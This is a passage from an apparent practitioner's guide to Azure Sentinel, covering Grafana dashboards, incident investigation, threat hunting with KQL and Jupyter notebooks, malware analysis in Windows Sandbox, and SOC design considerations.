Azure Sentinel and many other security products have adopted this framework and map alerts to the tactics and TTPs of MITRE. The activities that the 'Advanced Multistage Attack Detection' machine learning model detects map to TTPs in the following MITRE tactics:

° Persistence
° Lateral Movement
° Exfiltration
° Command and Control

5.11 What's next
While having real machine learning models in Azure Sentinel already helps up your defenses significantly, Microsoft is working on bring-your-own-ML functionality for Azure Sentinel. It's currently in private preview and expected to release early 2020. It allows you to bring your own machine learning model to the party using Azure Databricks.

Even more powerful is a third option that Microsoft is pursuing: extending the existing models that you get in the box. A sort of hybrid between developing your own from scratch and just using what is there. A great example would be extending the existing anomalous-logons ML model with data from your badge key access system. This could further reduce false positives by understanding whether somebody is physically present at a certain location.

6. Dashboarding.


Each day we collect more and more data. Making sure we collect -all- the relevant data is by itself already a daunting task, but the effort is meaningless if we can't make it actionable. Machine learning, like that available in Azure Sentinel FUSION, makes data actionable in an easy way.

However, to support your Security Operations Center (SOC), it helps to visualize the data and provide a clear picture of it as it flows in. While Azure Sentinel has out-of-the-box dashboarding capabilities, it also works great with third-party solutions.

In this chapter I’ll show you Grafana, and the Log Analytics connector that Microsoft provides for Grafana, to visualize your Azure Sentinel data.

6.1 Dashboarding
Dashboarding has been around for a long while in Microsoft's security solutions. More than ten years ago, in 2009, I presented on Microsoft's Audit Collection Services (ACS), part of System Center Operations Manager (SCOM), at TechEd North America, and on how it could help visualize the security status of your environment using dashboards.

Now that organizations are moving from SCOM to Azure Monitor, they can start using the more advanced dashboarding capabilities that Microsoft Azure provides. With the just-released AIOps feature, Microsoft provides you with so-called Dynamic Thresholds.

“With Dynamic Thresholds you no longer need to manually identify and set thresholds for alerts. The alert rule leverages advanced machine learning (ML) capabilities to learn a metric's historical behavior, while identifying patterns and anomalies that indicate possible service issues.”
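Conceptually, a dynamic threshold is learned from the metric's own history instead of being set by hand. The following toy sketch (mean plus three standard deviations, which is NOT Azure Monitor's actual algorithm) shows the basic idea on made-up sample data:

```python
import statistics

# Toy version of a "dynamic threshold": learn a bound from the metric's
# own history instead of hard-coding one. Azure Monitor's real
# implementation uses far more sophisticated ML than mean + k*stdev.
history = [52, 48, 50, 49, 51, 50, 47, 53]  # e.g. requests/sec, sample data

mean = statistics.mean(history)
stdev = statistics.stdev(history)
threshold = mean + 3 * stdev  # flag values far outside learned behavior

def is_anomalous(value):
    return value > threshold

print(is_anomalous(51), is_anomalous(95))  # False True
```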

One thing to understand is that security dashboarding is different from dashboarding in availability and performance management. Here's a quote from a recent presentation I did:

"Security dashboards are different than IT operations dashboards: security searches for outliers (because those are risky), while in Ops, if all goes well, you are green (99%)." — Maarten Goet

Therefore, Azure Sentinel provides specific security dashboards out-of-the-box. Some of them are solution-focused (Office 365), some are technically focused (Insecure Protocols) and some are geared towards third parties (F5, Palo Alto, etcetera). Technically, these are JSON files that work in the Azure Dashboards section of your portal.

Microsoft regularly updates its GitHub repository with new versions of the dashboards as it receives feedback from the field. You can manually update the JSON file in your tenant or use the built-in functions in the Azure Sentinel UI.

6.2 Grafana
Another popular choice for visualizing data from Azure Sentinel is to use open source visualization tools. Grafana calls itself the open platform for beautiful analytics and monitoring. Grafana is a great option because it has a large 'store' with visualization types (most of them free), and because Microsoft provides you with a native Log Analytics connector for Grafana.

With that connector, you can use Kusto (KQL) queries to get specific data from Azure Sentinel and map it onto one of Grafana's visualizations. For instance, a world map with network connections, or a list of alerts. Grafana has dashboarding features that most SOCs will love, for instance rotating dashboards.

Grafana is a very versatile platform and goes beyond just traditional dashboarding. It has features for sending notifications, annotating dashboards, mixing and matching data sources, and much more.

6.3 What about Kibana?
Kibana is another popular open source tool that helps you visualize and understand trends within log data. Kibana is the 'K' in the ELK stack, the world's most popular open source log analysis platform, and provides users with a tool for exploring, visualizing, and building dashboards on top of the log data stored in Elasticsearch clusters.

Asaf Yigal summarizes it as follows:

“Kibana’s core feature is data querying and analysis. Using various methods, users can search the data indexed in Elasticsearch for specific events or strings within their data for root cause analysis and diagnostics. Based on these queries, users can use Kibana’s visualization features which allow users to visualize data in a variety of different ways, using charts, tables, geographical maps and other types of visualizations.

The key difference between the two visualization tools stems from their purpose. Grafana is designed for analyzing and visualizing metrics such as system CPU, memory, disk and IO utilization. Grafana does not allow full-text data querying. Kibana, on the other hand, runs on top of Elasticsearch and is used primarily for analyzing log messages.

If you are building a monitoring system, both can do the job well, though there are still some differences that will be outlined below. If it's logs you're after, for any of the use cases that logs support — troubleshooting, forensics, development, security — Kibana is your option.”

6.4 Easily available from the Azure Marketplace
There are a couple of ways to get Grafana. Grafana has its own hosting option called GrafanaCloud, which is free for 1 user and 5 dashboards. On their download page you can also find binaries for Windows, Linux and Mac, and there is even an ARM option. And yes, there is a Docker container.

However, Microsoft’s Azure Marketplace also offers a Grafana image. Just pick a VM size and it will install Ubuntu (latest) together with Grafana (latest). The default port on which Grafana is published is port 3000.


6.5 Azure integration out-of-the-box Microsoft has built a Grafana data source for Azure Monitor, Azure Log Analytics and Application Insights. It supports both getting metrics directly from Azure Monitor and/or Azure Application Insights for creating ITOps availability and performance management dashboards.

However, the data source also supports connections to Azure Log Analytics workspaces and fetching results from KQL queries. And because Azure Sentinel is based on a Log Analytics workspace, the data source works out of the box with security data from Azure Sentinel.

PRO TIP: Writing queries in Grafana is made simple with the familiar IntelliSense auto-complete options you've already seen in the Azure Log Analytics query editor.

6.6 The value is in the Plugins
One of the strong points of Grafana is the fact that it supports plugins. Some are built by Grafana, but there is a strong community out there as well. Some plugins provide you with a 'panel', a new way of visualizing the data, while others are 'data sources', allowing you to connect to a new data repository. Grafana also has plugins they call "Apps" that are essentially a bundle of panels, data sources, dashboards and new UI pages.

For instance, Grafana built an App for Kubernetes. No need to figure out how to connect, what data to retrieve, and how to visualize: the App takes care of all of that. Just point it to your Kubernetes cluster and you’re good to go.

6.7 Let's visualize Azure Sentinel data
The scenario we'll be visualizing is about potential malicious connections. Azure Sentinel not only stores IP addresses etcetera, but also the longitude and latitude of the connections, which we'll be using for our dashboard.

After you've set up Grafana, you need to add the Azure Monitor data source and configure a connection to your (Log Analytics workspace based) Azure Sentinel environment. After this, add the community World Map plugin. Create a new dashboard, add the World Map panel, and open up the configuration of that panel. Select 'Azure Log Analytics' as the service, select your workspace (the name of your Azure Sentinel environment) and paste in the KQL query.
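For reference, here is a KQL query of the kind you might paste into the World Map panel, held in a Python string for convenience. It is a starting point, not the book's exact query; VMConnection and its Remote* columns are the ones used in the hunting chapter, so adapt the table and filters to the data you actually collect:

```python
# Illustrative KQL for a World Map panel. VMConnection, Direction and the
# RemoteLatitude/RemoteLongitude columns are the ones used elsewhere in
# this book; treat the whole query as an assumption to adapt.
worldmap_query = """
VMConnection
| where Direction == 'outbound'
| summarize ConnectionCount = count() by RemoteLatitude, RemoteLongitude
"""
print(worldmap_query.strip())
```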

The result: a world map showing potential malicious connections and their geolocation.

6.8 What about my other data?
As discussed earlier in this chapter, Grafana can also be used to visualize ITOps data such as availability and performance management. Marc van Eijk, Senior Program Manager on the Azure team, also used Grafana to build an Azure Stack Uptime Monitor.

Want to geo-visualize the people pounding on your SSH port in real time? No problem. Want to see your DNS analytics? There is a Grafana plugin for that.

6.9 What key indicators will you be reporting on?
Simon Persin makes a great point:

“The challenge for any organization when defining key risk indicators (KRIs) for cyber security is that it is different for every enterprise. There is no blueprint to use as guidance; no one KRI that is pervasive or generic across all businesses, or even industry sectors, because the variances of what needs to be considered are diverse.”

Every business needs to understand for itself which type of attacks or risks could affect it most significantly. Only once those risks are identified can a potential detection strategy be put in place to highlight whether the risk is starting to occur. Even then, the way in which an attack could occur will also depend on the structure and setup of the company itself.

One helpful resource in this regard is MITRE's ATT&CK framework.

7. Investigation.


Separating the wheat from the chaff in cybersecurity is hard. Often you find yourself handling enormous volumes of events. And more often than not, data quality is an issue. False positives often lead to triage fatigue.

Being able to do triage quickly is important. The time window to respond when under attack is short; advanced adversaries typically need only hours to gain access, elevate privileges and exfiltrate data.

Azure Sentinel has an Investigation feature. Let's look at the difference between investigating and hunting, and at how exactly Azure Sentinel can help your SOC with both.

7.1 How does a SOC typically operate?
Before we dive into Azure Sentinel's new investigation features, let's rewind and first look at how a Security Operations Center (SOC) operates. Most SOCs have two critical functions: (1) setting up and maintaining security monitoring and related tooling, and (2) finding suspicious or malicious activity by analyzing alerts.

For the latter, a SOC will typically have a 3-tier model. Tier 1 is where security analysts do the triaging; they review the latest alerts to determine relevancy and urgency. Alerts that signal an incident are forwarded to Tier 2 analysts.

The second tier reviews those cases and uses threat intelligence (IOCs, etc.) to identify affected systems and the scope of the attack. Tier 3 analysts are often the most experienced people on the team, usually referred to as threat hunters. They explore the environment to identify stealthy threats and conduct continuous vulnerability tests.

In most SOCs the Tier 2 folks will do the investigations, and the Tier 3 folks will do the hunting. And while there is no clear line, most people use the term investigation when following up on a case forwarded by Tier 1.

7.2 Investigation UI in Azure Sentinel
Microsoft has an investigation experience in Azure Sentinel. Previously, you would find an investigation UI in Azure Security Center, but as Azure Sentinel is becoming the central place to aggregate security data, investigations will likely happen from there, and therefore Microsoft is deprecating the investigation UI in ASC. To get to the new investigation experience in Azure Sentinel you will need to navigate to an incident. For every incident you'll find two buttons: View Full Details and Investigate.

The investigation experience window has three sections: the top will show the case name and other case details. On the right you'll find four buttons: Timeline, Info, Entities and Help. The main window shows all the entities related to this incident in a graph-style manner.

Clicking an entity will show its details; hovering over the entity will give you some quick actions, for instance: Related Alerts, Hosts the Account Failed on, Hosts which the Account Logged On to.

Clicking these will show the results as extra entities in your graph, expanding your search. There is also the opportunity to dive into the raw results, pivoting from the graph to a KQL query window.

The Timeline button on the right allows you to 'bookmark' results during your investigation and have them readily available as information in this 'notebook'.

7.3 Entity mapping is important!
When you're creating alert rules in Azure Sentinel, which will trigger incidents when their criteria are met, you have the option to do entity mapping. From the underlying KQL query, you can pick any field and map it to either 'Account', 'Host' or 'IP Address'.

This allows Azure Sentinel to recognize that data as such, provide the right quick investigation items and, more importantly, link data and incidents together. More entities are coming soon, but for now these three are available: Account, Host and IP Address.

7.4 OK, so what about hunting and supporting Tier 3 SOC analysts?
In a previous chapter I wrote about cloud-native threat hunting with Jupyter and Azure Notebooks. I talked about how you could take the 'Kqlmagic' extension that Microsoft wrote, and use KQL queries in Jupyter notebooks to hunt for malicious actors.

Something I did not mention in that chapter is the built-in support for hunting that Azure Sentinel has. Microsoft provides you with pre-compiled KQL queries to find known indicators in your environment. These are available in the Hunting node under the Threat Management section and are mapped back to the tactics of the MITRE ATT&CK framework. You can add your own favorite hunting queries to the workspace as well. Directly from this section of Azure Sentinel you can run a query by using the Run Query button.

When running the query, you can expand (one of) the results and use the [..] button to access the Bookmark function. This saves results and allows you to relate them to an ongoing campaign by using the Tags field. You'll find these saved queries in the Hunting section of Azure Sentinel under the Bookmarks tab.


8. Threat hunting in the cloud.

Robert M. Lee, CEO of Dragos Inc. has a great quote:

“Threat hunting exists where automation ends.” Threat hunting is largely manual, performed by SOC analysts trying to find a ‘needle in the haystack’. And in the case of cybersecurity, that haystack is a pile of ‘signals’.

8.1 Kusto (KQL)
Kusto Query Language, or KQL for short, is the default way to work with data in Azure Data Explorer powered services such as Log Analytics, Azure Security Center, Azure Monitor and many more. It is a powerful yet easy to learn language.

Robert Cain, a Microsoft MVP, has written a 4-hour course on Pluralsight that you can take for free to learn the language, all the way up to advanced queries. KQL skills are something you'll need if you will be doing threat hunting in Azure; most of the security data will be in Log Analytics workspaces.
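To give a first taste of the language: a KQL query is a pipeline of operators separated by '|'. The sample below is held in a Python string; the VMConnection table is the one used in the hunting examples later in this book, and the exact columns are an assumption to adapt to your workspace:

```python
# A first KQL query (as a string). KQL reads top-to-bottom as a pipeline:
# take a table, filter it, aggregate, then keep the top results.
# VMConnection/Computer/RemoteIp are assumed column names -- adjust to
# the tables you actually collect.
sample_kql = """
VMConnection
| where Computer == 'APPSERVER'
| summarize Connections = count() by RemoteIp
| top 10 by Connections
"""
```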

8.2 Jupyter
Jupyter Notebook, formerly called IPython, is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text through Markdown. It is already broadly used in data science, and has support for lots of programming languages such as R, Python, etc. The multi-user version of Jupyter is called JupyterHub.

The cool thing is that you can share your notebook with others, and that you can produce interactive output using HTML etc. and display that through a so called “presentation mode”. This makes it great for threat hunting and sharing signals within the SOC team.

On GitHub you’ll find ready-to-run Docker images containing Jupyter.

8.3 Azure Notebooks
Azure Notebooks is currently in public preview and is a free hosted service to develop and run Jupyter notebooks in the cloud with no installation. Azure Notebooks is a free service, but each project is limited to 4GB memory and 1GB data to prevent abuse. Legitimate users that exceed these limits see a Captcha challenge to continue running notebooks.

However, if the Azure Active Directory account you sign in with is associated with an Azure subscription, you can connect to any Data Science Virtual Machine (DSVM) instances within that subscription. DSVMs can be found in the Azure Marketplace. With these dedicated DSVMs you can add better processing power and remove any of those limits. In the case of Azure Notebooks, it also allows you to share your notebooks using GitHub.

PRO TIP: You need to deploy the Ubuntu version of the DSVM. The Windows version of the DSVM does not contain JupyterHub by default. The Ubuntu template of the DSVM has an extra bonus: it will open up the right ports by default in your NSG!

8.4 Pandas, KQLMagic and other libraries
One of the things you will find out early using Jupyter is that you will want to manipulate data. This is where a library called Pandas comes in. Pandas is an open source Python framework, maintained by the PyData community and mostly used for data analysis and processing.

Another library you will need is KQLMagic. Michael Binshtock, who works at Microsoft, wrote this library, which allows you to directly query Log Analytics-based workspaces in Azure, for instance when working with data in Azure Monitor, Azure Security Center, etcetera.

The great thing about this library is that it uses the Kusto Query Language (KQL), which means that you can use your favorite KQL queries directly in Jupyter.

8.5 Real-world threat hunting
Let's look at a real-world example. In this case we have a number of virtual machines running in Microsoft Azure, and Azure Security Center is turned on at the subscription level to capture relevant security events.

We're suspicious of a machine called APPSERVER, based on an alert we got, and want to do some investigation.

° We go to Azure Notebooks and log in
° We create a new Project called 'Threat Hunting'
° We create a new Notebook called 'Azure threat hunting'
° We will use the Free Compute option and open the notebook

The Docker image that the Free Compute option provides already contains the Kqlmagic library that we will need. If you're using a dedicated DSVM, or are running Jupyter locally, you should run the install command to get the library installed:

!pip install Kqlmagic --no-cache-dir --upgrade
%reload_ext Kqlmagic

° Now we will need to authenticate to the Log Analytics workspace we will be using. In this case we will be connecting to Azure Security Center:

%kql loganalytics://tenant='';clientid='';clientsecret='';workspace='';alias=''

PRO TIP: The Free Compute option is a Docker container in a shared compute environment, and therefore it will take a couple of minutes before the library loads. You can look 'behind the scenes' by using the Terminal button: through the terminal window you can issue commands such as 'ps' or 'top'.

° We can now run KQL queries to look at the data being captured by Azure Security Center for this machine. In this case we'll have a look at the network connections it has:

%kql VMConnection | where Computer == 'APPSERVER'

° If you want to go multi-line to make things more readable, you need to use a double %. As our application server is in The Netherlands, I will apply a filter and only show the connections going to IP addresses outside of our country:

%%kql
VMConnection
| where Computer == 'APPSERVER'
| where Direction == 'outbound'
| where RemoteCountry != 'Netherlands'

connections = _.to_dataframe()

PRO TIP: While in the KQL query interface in Azure you'll be using the double quote character for specifying input, in Jupyter you'll be using the single quote. Make sure to change your queries so that they work properly in Jupyter.

° Let's see if any of these IP addresses match a TOR node. There is a current list of TOR nodes and their IP addresses at https://www.dan.me.uk/torlist. We can load that into our notebook using Pandas:

import pandas as pd
torlist = pd.read_csv('https://www.dan.me.uk/torlist', header=0, names=["DestinationIp"])

° The next step is to compare the two lists to see if there are any matches:

connections.merge(torlist, on="DestinationIp")

° Another great way of visualizing your data is taking the longitude and latitude points from the KQL query and putting them on a world map. Add the following lines to your KQL query:

| distinct RemoteLongitude, RemoteLatitude
| project RemoteLongitude, RemoteLatitude
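For readers without a workspace at hand, the TOR-matching step can be sketched offline. The stand-in below uses fabricated documentation IP addresses and plain Python instead of the pandas merge; in the real notebook, connections comes from the KQL query and torlist from dan.me.uk:

```python
# Offline sketch of the TOR-node matching step. Both inputs here are
# fabricated sample values (RFC 5737 documentation addresses), NOT real
# query results or real TOR nodes.
connections = [
    {"Computer": "APPSERVER", "DestinationIp": "203.0.113.10"},
    {"Computer": "APPSERVER", "DestinationIp": "198.51.100.7"},
]
torlist = {"198.51.100.7", "192.0.2.99"}  # normally loaded from the TOR list

# Equivalent of connections.merge(torlist, on="DestinationIp"):
matches = [c for c in connections if c["DestinationIp"] in torlist]
print(matches)  # one suspicious connection in this sample
```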

From this point on you'll likely want to do some more investigation and assess whether or not there is a real threat. Use your own hunting skills for that ;-)

8.6 Sharing your findings
A unique feature of Jupyter is the presentation mode. It allows you to easily share key findings with your audience in a visually friendly way, without having to copy and paste data to another application.

You can use Markdown text to annotate your notebook. Enable the slide picker by going to the View menu, Cell Toolbar, then Slide Show. Go to any row and on the right-hand side select whether to skip it, make it part of a slide, etcetera.

Lastly, click on 'Enter/Exit RISE Slideshow' to share your findings.

8.7 Jupyter: for threat hunting with Azure Sentinel
Jupyter is a great platform for threat hunting. You can work with data in context and natively connect to security backends in Microsoft Azure using Kqlmagic. Best of all, using Azure Notebooks and Azure Security Center, we didn't spend a dollar and got our threat hunting platform for free. Start learning KQL, Python and Jupyter today and supercharge your hunting skills!


9. Malware analysis.


Did you go threat hunting and think you found a piece of malware? Windows 10 version 1903 and newer include a new operating system feature called Windows Sandbox: a lightweight desktop environment tailored for safely running applications in isolation, making it ideal for malware analysis.

Windows Sandbox is built on the same technologies that power Windows Containers, making it more suitable to run on laptops without requiring the full power of Windows Server or a full VM.

9.1 Windows Sandbox
At its core Windows Sandbox is a lightweight virtual machine, so it needs an operating system image to boot from. One of the key enhancements Microsoft made for Windows Sandbox is the ability to use a copy of the Windows 10 installation on your computer, instead of downloading a new VHD image as you would with an ordinary virtual machine.

Sandbox always presents a clean environment, but the challenge is that some operating system files can change. Microsoft's solution is to construct what they refer to as a "dynamic base image": an operating system image that has clean copies of files that can change, but links to files that cannot change in the Windows image that already exists on the host. The majority of the files are links (immutable files), which is why the image is so small (100MB) for a full operating system. Microsoft calls this instance the "base image" for Windows Sandbox, using Windows Container parlance.


Windows Sandbox uses Microsoft's hypervisor. It is essentially running another copy of Windows, which needs to be booted, and this can take some time. So rather than paying the full cost of booting the sandbox operating system every time you start Windows Sandbox, Microsoft uses two other technologies: "snapshot" and "clone". Snapshot allows Microsoft to boot the sandbox environment once and preserve the memory, CPU, and device state to disk. When you need a new instance of Windows Sandbox, it can then restore the sandbox environment from disk and put it in memory rather than booting it. This significantly improves the start time of Windows Sandbox.

PRO TIP: Windows Sandbox is also aware of the host's battery state, which allows it to optimize power consumption. This is great for using it on laptops.

9.2 Enabling Sandbox in Windows
Windows Sandbox is built in starting with build 1903 of Windows 10. You need either the Pro or Enterprise edition to enable it. Here are the high-level steps to enable the feature:

° Open Settings, go to Add or Remove Windows Features
° Select Windows Sandbox
° Restart
° Windows Sandbox will be in your Start Menu

As a minimum your device requires the AMD64 architecture, virtualization capabilities enabled in BIOS, at least 4GB of RAM, at least 1GB of free disk space and at least 2 CPU cores.

PRO TIP: If you are using a virtual machine, enable nested virtualization with this PowerShell cmdlet:

Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true

9.3 Customizing your Sandbox environment
It is possible to customize certain aspects of your Windows Sandbox environment, for instance automatically launching a script at startup, mapping certain folders from the host into the Sandbox, etc. Currently these four aspects can be customized:

° Enable or disable the virtualized GPU.
° Enable or disable networking in the sandbox.
° Share folders from the host.
° Run a startup script or program.

To achieve this, Windows Sandbox uses so-called Sandbox config files. These have a file extension of .WSB and are XML-based. Here's an example:

<Configuration>
  <VGpu>Disable</VGpu>
  <Networking>Disable</Networking>
  <MappedFolders>
    <MappedFolder>
      <HostFolder>C:\Users\MaartenGoet\Downloads</HostFolder>
      <ReadOnly>true</ReadOnly>
    </MappedFolder>
  </MappedFolders>
  <LogonCommand>
    <Command>explorer.exe C:\users\WDAGUtilityAccount\Desktop\Downloads</Command>
  </LogonCommand>
</Configuration>

Disabling or enabling the GPU and/or network is straightforward, as you can see in the example. For Shared Folders you need to specify a folder that you want to share with the host system, e.g. C:\MALWARE, and whether you want it to be read-only or support write operations as well. Setting TRUE in the ReadOnly value makes it read-only, and FALSE enables read and write support.

PRO TIP: Note that folders are always mapped under the path C:\Users\WDAGUtilityAccount\Desktop in your Windows Sandbox.

<HostFolder>path to the host folder</HostFolder>
<ReadOnly>value</ReadOnly>

For the Command at Logon you may specify a file name and path or a script. The command EXPLORER.EXE would work, as would a reference to a script, for instance: C:\Users\WDAGUtilityAccount\Desktop\MappedFolder\start.cmd.


Save the file as SOMETHING.WSB and launch it whenever you want to run the Sandbox with this configuration.

9.4 Analyzing Malware in Windows Sandbox
How do we get our malware samples into Windows Sandbox? While you can’t drag and drop files onto Windows Sandbox, the operating system actually allows you to copy & paste files into it. And as we saw above, you could also use a mapped folder to achieve this. And if you’ve enabled networking, you could also use regular applications such as Microsoft Edge to download files from any of your favorite malware analysis sites.

PRO TIP: You can find the Sysinternals tools ready for use at http://live.sysinternals.com

To copy your findings back to your host machine, you could use the mapped Host Folder (enable it for Read Write) or just Copy & Paste it back from the Sandbox window to your host. Or just use OneNote online from your browser.


10. Design Considerations.

Microsoft provides Azure Sentinel as-a-service, which you can enable with the click of a button, only paying for the storage you use. However, Azure Sentinel, as with any cloud service or SIEM, still needs some design consideration if you are putting it into production. What are these considerations? And what options are available to me and my company?

10.1 Let’s look at the foundation first Before we start, let’s revisit some of the key concepts and understand the fundamentals. Azure Sentinel uses a Log Analytics workspace as its backend, storing events and other information. Log Analytics workspaces are the same technology as Azure Data Explorer uses for its storage. These backends are ultra-scalable, and you can get back results in seconds using the Kusto Query Language (KQL).

The first thing to plan for is the Log Analytics workspace we’ll be using. When setting up Azure Sentinel for the first time, it allows you to create a new Log Analytics workspace or to pick an existing one.

DESIGN CONSIDERATION: New or existing Log Analytics workspace?


Let’s look at why you would want to re-use an existing workspace. Of course, it would be the easy way; it is already there, you’ve set up the right access to it, data is already streaming in and you can just add Azure Sentinel to it. No problem, right?

Well, access control is one of the bigger reasons to create a new Log Analytics workspace instead. That allows you to tightly control who has access to the aggregated data in Azure Sentinel, which often is a CISO requirement, as we’ll discuss next.

Apart from access control reasons, you might also run into a technical challenge that forces you to create a new workspace; it is relatively hard to move an existing Log Analytics environment over to another subscription. You first need to offboard agents and remove current Solutions before you can move it. And that might cause ‘downtime’ for the monitoring solution currently using that workspace.

And of course, the last reason would be that sometimes you’ve built up a bit of history in your current environment; experimented with settings, have a workspace name that you’d like to change, etcetera, so you might want to start with a ‘clean slate’.

DESIGN CONSIDERATION: How long do we need to store our data?


One other thing to consider is how long you will want to store the data. The default setting is 31 days. However, you can change this workspace setting and extend retention up to two years. As per the documentation:

“The retention period of collected data stored in the database depends on the selected pricing plan. By default, collected data is available for 31 days, but this can be extended to 730 days. Data is stored encrypted at rest in Azure storage, to ensure data confidentiality, and the data is replicated within the local region using locally redundant storage (LRS). The last two weeks of data are also stored in SSD-based cache and this cache is encrypted.”

10.2 No, Azure Sentinel will NOT replace Azure Security Center
An often-heard remark is: “Oh, so Azure Sentinel will replace Azure Security Center.” No, no, no. Azure Security Center has its own place in the security landscape. It acts as the primary ‘engine’ to perform detections on Microsoft Azure, in your VMs, in containers and on other properties such as Azure Stack, your on-premises infrastructure, etcetera.

Want to detect crypto miners in your Linux VM on Azure? Enable Azure Security Center. Want to get best practices and insights on securing your network in Azure? Enable Azure Security Center.

However, if you want to coordinate your security operations centrally, and aggregate multiple security solutions, such as Azure Security Center, Microsoft’s Cloud App Security, Azure ATP and others, you will want to enable Azure Sentinel.

By connecting all these data sources, you can start building a single pane of glass, and have one point of entry for your responders when they need to go threat hunting.

DESIGN CONSIDERATION: Which other security solutions will I be enabling alongside Azure Sentinel?

10.3 The identity and access piece is important
As pointed out before, the CISO office will often require you to tightly control who has access to the aggregated data in Azure Sentinel, because it could contain personally identifiable information (PII). Normally only appointed security officers will be granted ‘read access’.

DESIGN CONSIDERATION: Who needs access to the data in Azure Sentinel? Can we provide that access ‘just in time’ to these people & roles?

Microsoft added RBAC features to Log Analytics workspaces, as Oleg Ananiev, the group program manager for both Azure Monitor and Log Analytics, recently announced. This implicitly works for Azure Sentinel as well.

As people come and go in a company, security officers will also likely change over time. We don’t want to grant access to a specific person but to the role he or she is fulfilling. We also don’t want to grant access all the time, but only when needed; for instance, when hunting for threats, or when a specific case was raised and an investigation is opened.

This is where Azure Active Directory (AAD) Privileged Identity Management (PIM) can help. You will need either Azure AD P2 licenses or EMS E5 licenses for those users you would like to use with Azure AD PIM.

10.4 Plan for the data connections
Azure Sentinel has a lot of possible data sources. Each and every one of those needs a data connection and potentially a configuration.

DESIGN CONSIDERATION: Which data sources will I be connecting? What configuration does that data connection need?

I won’t be writing up the configuration of every possible data source. But I will highlight a few that you need to think about, because there are things to know about how you can connect them:

° Office 365: You can have only one connection going back to your Office 365 tenant. Some of you may already be using the Office 365 ‘solution’ that was part of Microsoft’s Operations Management Suite (OMS) to ‘monitor’ security. You need to disconnect that one to be able to connect that Office 365 tenant to Azure Sentinel.

° Azure Security Center: If you have multiple subscriptions in your tenant, some or all containing Azure Security Center instances: no problem. However, Azure Sentinel will only be able to aggregate information from and connect to instances in the tenant that it is residing in.

° Network appliances: Most of the dashboards that Azure Sentinel provides for network vendors, such as Palo Alto, Check Point, Fortinet, F5 and Barracuda, rely on the data being ingested as syslog messages. This will require you to set up a Linux-based VM that has the Microsoft Monitoring Agent installed. That machine will receive the syslog messages and forward them to the Log Analytics workspace natively.
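To get a feel for what that Linux collector is handling, here is a toy Python parser for a classic BSD-style (RFC 3164) syslog line. The sample firewall message and field names are invented for illustration; the real parsing is of course done by the agent:

```python
import re

# A classic BSD-syslog (RFC 3164) line: "<PRI>TIMESTAMP HOST TAG: MSG"
SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d{1,3})>"
    r"(?P<timestamp>\w{3} [ \d]\d \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) "
    r"(?P<tag>[^:]+): "
    r"(?P<msg>.*)$"
)

def parse_syslog(line):
    """Split a syslog line into facility, severity, host and payload fields."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    pri = int(m.group("pri"))
    return {
        "facility": pri // 8,   # e.g. 16 = local0, common for network gear
        "severity": pri % 8,    # 0 = emergency ... 7 = debug
        "host": m.group("host"),
        "tag": m.group("tag"),
        "message": m.group("msg"),
    }

# Invented example resembling a firewall event:
sample = "<134>Jan 15 12:34:56 fw01 CEF: src=10.0.0.5 dst=8.8.8.8 act=deny"
event = parse_syslog(sample)
print(event)
```

Priority 134 decodes to facility local0 with informational severity, which is typical for firewall traffic logs.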


10.5 How should I connect other SIEM systems? Some enterprises will already have some sort of SIEM solution, like for instance ArcSight. And while I am NOT advocating that this is the preferred way of setting up cloud governance, your CISO office might want to hook up Azure Sentinel to that current system.

DESIGN CONSIDERATION: Will I be connecting Azure Sentinel to another SIEM solution?

If that is a requirement, you will want to consider using Azure Monitor and Event Hubs to forward your alerts to this other system. By using Event Hubs, you can do this safely and reliably; even when the receiving end is offline or malfunctioning, events get stored in the queue and Azure will release them when the system is back online.

If your system is not supported by Azure Monitor or Event Hubs, there is still a fair chance you can integrate it with Azure Sentinel. There is a growing list of third parties that have built their own integrations on top of the API that you can use.

10.6 How can we support the threat hunters? Up until now, we’ve talked about getting data into Azure Sentinel. But after it gets processed and an alert gets raised, you will want to investigate. Your threat hunting colleagues need access to the data to understand what is going on.

DESIGN CONSIDERATION: What technology will the threat hunting colleagues be using? Do they prefer Jupyter? Will they require KQL access to the workspace?

One of the ways to do threat hunting is using the Kusto Query Language (KQL) to search through events quickly and easily in the workspace. They could use Azure Data Explorer, the ‘Logs’ function of the Log Analytics workspace, a third-party application (such as Grafana) or the native Azure Sentinel UI in the Microsoft Azure portal.

That last option, going threat hunting from the Azure Sentinel portal UI, is a neat option. Microsoft provides you out of the box with pre-fab hunting queries and maps them back to the right Tactics category (fi: Initial Access, Lateral Movement, etcetera). Either way, consider what you would do to provide them with the right UI and access rights.

Another popular option among threat hunters is Jupyter. Microsoft has a free service based on Jupyter notebooks called Azure Notebooks. Through the ‘Kqlmagic’ extension, you can use Python to directly query the workspace using KQL queries. You can read about it in another chapter. Consider if they will be using Jupyter locally (fi: in a docker container) or if they’ll use Azure Notebooks. Also consider where you will be storing the notebooks; GitHub is a great option for that. And remember, Microsoft already provides you with many sample notebooks to get you jumpstarted.

10.7 Dashboards: how will we visualize the Azure Sentinel data? Azure Sentinel provides a lot of out-of-the-box dashboards. Some of them are solution focused (Office 365), some are technically focused (Insecure Protocols) and some are geared towards third parties (F5, Palo Alto, etcetera).

Technically, these are JSON files that work in the Azure Dashboards section of your portal. You import them into your Tenant, and they will be available for everyone who can access that Tenant. Of course, you can restrict this with the built-in Azure access controls as they are just resources like any other.

Microsoft regularly updates its (GitHub) repository with new versions of the dashboards as they receive feedback from the field. You can manually update the JSON file in your Tenant or use the built-in functions in the Azure Sentinel UI. Either way, you should plan for some change management around this.

DESIGN CONSIDERATION: What are my requirements for visualizing Azure Sentinel data? How do I provide access to those programs and/or operators?

Another popular choice to visualize data from Azure Sentinel is to use open source visualization tools. Grafana is a great option, because it has a large ‘store’ with visualization types (most of them free), and because Microsoft provides you with a native Log Analytics connector for Grafana.

With that connector, you can use Kusto (KQL) queries to get specific data from Azure Sentinel and map it onto one of Grafana’s visualizations. For instance, a world map with network connections, or a list of Alerts. Grafana has dashboarding features that most SOCs will love, for instance the rotating dashboards. You will of course need to plan access from Grafana to Azure Sentinel’s data.

10.8 Escalation and notifications
All the above are technical design considerations. However, if Azure Sentinel will be powering your Security Operations Center (SOC), you will need to design your processes as well. How will your Alerts be followed up? Do we need a connection to our ticketing system? What if alerts & tickets stay open for too long? Are the right people, and potentially the management, informed in time (before breaching the SLA)?

